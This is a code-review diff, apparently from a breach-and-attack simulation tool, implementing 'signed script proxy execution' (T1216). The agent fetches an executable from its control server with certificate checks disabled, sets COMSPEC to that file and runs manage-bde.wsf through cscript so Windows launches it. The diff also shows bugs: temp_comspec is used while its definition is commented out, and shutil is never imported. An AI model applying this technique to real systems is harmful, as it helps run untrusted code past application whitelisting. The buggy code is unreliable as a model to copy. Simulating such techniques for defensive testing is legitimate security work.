Code review changes

- smaller executable file; fetches it from the island when pba needs to run
- technique configured off by default
- other implementation changes

monkey/infection_monkey/control.py

@@ -325,6 +325,16 @@ class ControlClient(object):
         except requests.exceptions.RequestException:
             return False
 
+    @staticmethod
+    def get_T1216_pba_file():
+        try:
+            return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server,  # noqa: DUO123
+                                verify=False,
+                                proxies=ControlClient.proxies,
+                                stream=True)
+        except requests.exceptions.RequestException:
+            return False
+
     @staticmethod
     def should_monkey_run(vulnerable_port: str) -> bool:
         if vulnerable_port and \

monkey/infection_monkey/post_breach/actions/use_signed_scripts.py

@@ -1,7 +1,10 @@
+import subprocess
+
 from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
 from infection_monkey.post_breach.pba import PBA
 from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import (
     cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
+from infection_monkey.utils.environment import is_windows_os
 
 
 class SignedScriptProxyExecution(PBA):
@@ -10,4 +13,12 @@ class SignedScriptProxyExecution(PBA):
         super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC,
                          windows_cmd=' '.join(windows_cmds))
 
-        cleanup_changes()
+    def run(self):
+        original_comspec = ''
+        if is_windows_os():
+            original_comspec =\
+                subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode()  # noqa: DUO116
+
+        super().run()
+
+        cleanup_changes(original_comspec)

monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py

@@ -11,6 +11,6 @@ def get_commands_to_proxy_execution_using_signed_script():
     return windows_cmds
 
 
-def cleanup_changes():
+def cleanup_changes(original_comspec):
     if is_windows_os():
-        subprocess.run(get_windows_commands_to_reset_comspec(), shell=True)  # noqa: DUO116
+        subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True)  # noqa: DUO116

monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py

@@ -1,16 +1,25 @@
 import subprocess
+from pathlib import Path
 
-ORIGINAL_COMSPEC = r'C:\Windows\System32\cmd.exe'
+from infection_monkey.control import ControlClient
 
 
 def get_windows_commands_to_proxy_execution_using_signed_script():
-    global ORIGINAL_COMSPEC
-    ORIGINAL_COMSPEC = subprocess.check_output('echo %COMSPEC%', shell=True).decode()  # noqa: DUO116
+    # temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe']
+    # temp_comspec = Path(*temp_comspec_path)
+    with ControlClient.get_T1216_pba_file() as r:
+        with open(temp_comspec, 'wb') as f:
+            shutil.copyfileobj(r.raw, f)
+
+    windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n')  # noqa: DUO116
+    signed_script_path = [windir_path, 'System32', 'manage-bde.wsf']
+    signed_script = Path(*signed_script_path)
+
     return [
-        r'set comspec=infection_monkey\post_breach\signed_script_proxy\windows\random_executable.exe &&',
-        r'cscript C:\Windows\System32\manage-bde.wsf'
+        f'set comspec={temp_comspec} &&',
+        f'cscript {signed_script}'
     ]
 
 
-def get_windows_commands_to_reset_comspec():
-    return f'set comspec={ORIGINAL_COMSPEC}'
+def get_windows_commands_to_reset_comspec(original_comspec):
+    return f'set comspec={original_comspec}'

monkey/monkey_island/cc/app.py

@@ -35,6 +35,8 @@ from monkey_island.cc.resources.pba_file_upload import FileUpload
 from monkey_island.cc.resources.remote_run import RemoteRun
 from monkey_island.cc.resources.reporting.report import Report
 from monkey_island.cc.resources.root import Root
+from monkey_island.cc.resources.T1216_pba_file_download import \
+    T1216PBAFileDownload
 from monkey_island.cc.resources.telemetry import Telemetry
 from monkey_island.cc.resources.telemetry_feed import TelemetryFeed
 from monkey_island.cc.resources.test.clear_caches import ClearCaches
@@ -130,6 +132,7 @@ def init_api_resources(api):
     api.add_resource(Log, '/api/log', '/api/log/')
     api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
     api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
+    api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/')
     api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
                      '/api/fileUpload/<string:file_type>?load=<string:filename>',
                      '/api/fileUpload/<string:file_type>?restore=<string:filename>')

monkey/monkey_island/cc/resources/T1216_pba_file_download.py

@@ -0,0 +1,15 @@
+from pathlib import Path
+
+import flask_restful
+from flask import send_from_directory
+
+
+class T1216PBAFileDownload(flask_restful.Resource):
+    """
+    File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA)
+    """
+
+    def get(self):
+        executable_file_path = ['monkey_island', 'cc', 'resources', 'pba', 'T1216_random_executable.exe']
+        executable_file = Path(*executable_file_path)
+        return send_from_directory(executable_file)

monkey/monkey_island/cc/services/attack/attack_schema.py

@@ -189,7 +189,7 @@ SCHEMA = {
                 "T1216": {
                     "title": "Signed script proxy execution",
                     "type": "bool",
-                    "value": True,
+                    "value": False,
                     "necessary": False,
                     "link": "https://attack.mitre.org/techniques/T1216",
                     "description": "Adversaries may use scripts signed with trusted certificates to "

monkey/monkey_island/cc/services/attack/technique_reports/T1216.py

@@ -7,9 +7,9 @@ __author__ = "shreyamalviya"
 
 class T1216(PostBreachTechnique):
     tech_id = "T1216"
-    unscanned_msg = "Monkey didn't attempt to execute an arbitrary file with the help of a " +\
+    unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
                     "pre-existing signed script since it didn't run on any Windows machines."
-    scanned_msg = "Monkey attempted to execute an arbitrary file with the help of a " +\
+    scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
                   "pre-existing signed script on Windows but failed."
-    used_msg = "Monkey executed an arbitrary file with the help of a pre-existing signed script on Windows."
+    used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows."
     pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]

monkey/monkey_island/cc/services/config_schema/monkey.py

@@ -67,8 +67,7 @@ MONKEY = {
                         "HiddenFiles",
                         "TrapCommand",
                         "ChangeSetuidSetgid",
-                        "ScheduleJobs",
-                        "SignedScriptProxyExecution"
+                        "ScheduleJobs"
                     ]
                 },
             }